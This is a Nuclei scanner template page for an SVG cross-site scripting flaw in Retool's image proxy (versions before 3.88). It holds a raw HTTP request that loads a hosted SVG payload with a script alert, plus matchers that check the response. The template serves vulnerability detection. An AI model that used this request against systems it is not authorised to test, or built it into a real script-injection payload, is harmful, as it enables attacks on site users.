Retool < 3.88 - SVG Cross-Site Scripting

ID: retool-svg-xss

Severity: high

Author: iamnoooob,iamnoooob,pdresearch

Tags: retool,xss

Description

This template checks for SVG Cross-Site Scripting(XSS) vulnerability via the Image Proxy URL parameter in Retool.

YAML Source

id: retool-svg-xss

info:
  name: Retool < 3.88 - SVG Cross-Site Scripting
  author: iamnoooob,iamnoooob,pdresearch
  severity: high
  description: |
    This template checks for SVG Cross-Site Scripting(XSS) vulnerability via the Image Proxy URL parameter in Retool.
  reference:
    - https://docs.retool.com/releases/edge/3.88#:~:text=Fixed%20an%20SVG%20XSS%20vulnerability%20by%20adding%20a%20CSP.%20(%2349381)
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="x-retool"
  tags: retool,xss

http:
  - raw:
      - |
        GET /api/imageProxy?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "alert('document.domain');"
          - "<?xml version"
          - '<script type="text/javascript">'
        condition: and

      - type: word
        part: header
        words:
          - "Content-Security-Policy: default-src 'none';"
        negative: true

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ffe611a8a51600132ff29329ebd8cc8976f60d4f5e2417fd83e7b1c360b29ddc0221008ca6ed892daea66a6726edee134056d427a9758bd1fa6b5f92f1886310e8ab1a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/retool/retool-svg-xss.yaml"

View on Github